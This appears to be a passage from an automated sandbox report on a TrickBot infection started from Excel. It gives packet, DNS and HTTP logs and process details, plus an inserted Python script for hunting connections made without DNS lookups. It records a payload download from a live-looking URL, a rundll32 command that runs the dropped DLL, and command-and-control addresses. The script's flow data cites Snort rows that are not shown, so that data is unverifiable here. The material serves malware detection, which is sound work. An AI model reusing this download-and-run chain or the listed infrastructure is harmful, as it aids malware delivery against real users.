Feb 20, 2021 02:16:43.943301916 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943329096 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943341017 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943371058 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943392992 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943412066 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943423986 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943463087 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943476915 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943509102 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943512917 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943547964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943553925 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943587065 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943592072 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943627119 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 02:16:43.609155893 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:16:43.670814037 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:18:53.927275896 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:18:53.986989021 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:18:53.993416071 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:18:54.043324947 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:18:56.465553999 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:18:56.518466949 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:18:56.523504972 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:18:56.574853897 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 20, 2021 02:16:43.609155893 CET | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | www.chipmania.it | A (IP address) | IN (0x0001)
Feb 20, 2021 02:18:56.465553999 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Feb 20, 2021 02:18:56.523504972 CET | 192.168.2.22 | 8.8.8.8 | 0x4a40 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | www.chipmania.it | chipmania.it | - | CNAME (Canonical name) | IN (0x0001)
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | chipmania.it | - | 185.81.0.78 | A (IP address) | IN (0x0001)
Feb 20, 2021 02:18:56.518466949 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 20, 2021 02:18:56.574853897 CET | 8.8.8.8 | 192.168.2.22 | 0x4a40 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
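The tables above show one named download (www.chipmania.it, resolved to 185.81.0.78 before the HTTP session on port 49165) and, per the Snort rows, two TLS connections to 142.202.191.164 and 193.8.194.96 for which no decoded DNS answer returns those addresses. Connecting to an address that was never resolved by name is a useful hunting signal for hard-coded CnC lists. The Python below is an added example and is not part of this report; its records are constructed from the rows above (the first packet of each flow and the chipmania.it A record), and it flags every flow whose destination was not returned by a DNS answer that arrived before the flow started.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Added example, not part of the sandbox report. Records are constructed
# from the TCP, DNS Answers and Snort tables of the report above.


@dataclass(frozen=True)
class DnsAnswer:
    ts: datetime
    name: str
    address: str          # A-record target; CNAME-only answers carry no address


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_ts(text: str) -> datetime:
    """Parse timestamps as the report prints them ('Feb 20, 2021 02:16:43.670814037 CET').
    The zone suffix is dropped and nanoseconds are truncated to microseconds."""
    if text.endswith(" CET"):
        text = text[:-4]
    base, frac = text.rsplit(".", 1)
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


DNS_ANSWERS = [
    DnsAnswer(parse_ts("Feb 20, 2021 02:16:43.670814037 CET"), "chipmania.it", "185.81.0.78"),
]

FLOWS = [
    Flow(parse_ts("Feb 20, 2021 02:16:43.694610119 CET"), "192.168.2.22", 49165, "185.81.0.78", 80),
    Flow(parse_ts("Feb 20, 2021 02:18:53.303160000 CET"), "192.168.2.22", 49167, "142.202.191.164", 443),
    Flow(parse_ts("Feb 20, 2021 02:18:55.128222000 CET"), "192.168.2.22", 49169, "193.8.194.96", 443),
]


def resolve_flows(flows: List[Flow], answers: List[DnsAnswer]) -> List[Tuple[Flow, Optional[str]]]:
    """Pair each flow with the name from the most recent DNS answer, received
    no later than the flow's first packet, that returned the flow's destination
    address. Flows with no such answer get None."""
    by_addr: Dict[str, List[DnsAnswer]] = {}
    for a in answers:
        by_addr.setdefault(a.address, []).append(a)
    result = []
    for f in sorted(flows, key=lambda x: x.ts):
        prior = [a for a in by_addr.get(f.dst, []) if a.ts <= f.ts]
        name = max(prior, key=lambda a: a.ts).name if prior else None
        result.append((f, name))
    return result


def unresolved_destinations(flows: List[Flow], answers: List[DnsAnswer]) -> List[str]:
    """Destinations contacted without a prior DNS answer, as 'ip:port' strings."""
    return [f"{f.dst}:{f.dport}" for f, name in resolve_flows(flows, answers) if name is None]


if __name__ == "__main__":
    for flow, name in resolve_flows(FLOWS, DNS_ANSWERS):
        print(f"{flow.ts.time()} {flow.dst}:{flow.dport} <- {name or 'NO PRIOR DNS ANSWER'}")
```

Treat a hit as a lead, not a verdict: a host's cache, a hosts-file entry, DNS over HTTPS, or resolution that happened before the capture began all produce connections with no visible DNS. In this report the UDP table also shows two DNS exchanges at 02:18:53 that the DNS Queries table does not decode, so confirm against the pcap before concluding that an address was hard-coded.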

HTTP Request Dependency Graph

• www.chipmania.it

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 20, 2021 02:16:43.753083944 CET | 0 | OUT | GET /mails/open.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.chipmania.it
Connection: Keep-Alive
Feb 20, 2021 02:16:43.822292089 CET | 2 | IN | HTTP/1.1 200 OK
Date: Sat, 20 Feb 2021 01:16:43 GMT
Server: Apache
Content-Disposition: attachment; filename="8.jjkes"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=1, max=100
Transfer-Encoding: chunked
Content-Type: application/octet-stream


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time:02:16:34
Start date:20/02/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f180000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:02:16:40
Start date:20/02/2021
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase:0xff7b0000
File size:45568 bytes
MD5 hash:DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:02:16:40
Start date:20/02/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase:0xea0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:02:16:42
Start date:20/02/2021
Path:C:\Windows\System32\wermgr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wermgr.exe
Imagebase:0xffe40000
File size:50688 bytes
MD5 hash:41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:02:16:42
Start date:20/02/2021
Path:C:\Windows\System32\wermgr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wermgr.exe
Imagebase:0xffe40000
File size:50688 bytes
MD5 hash:41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis
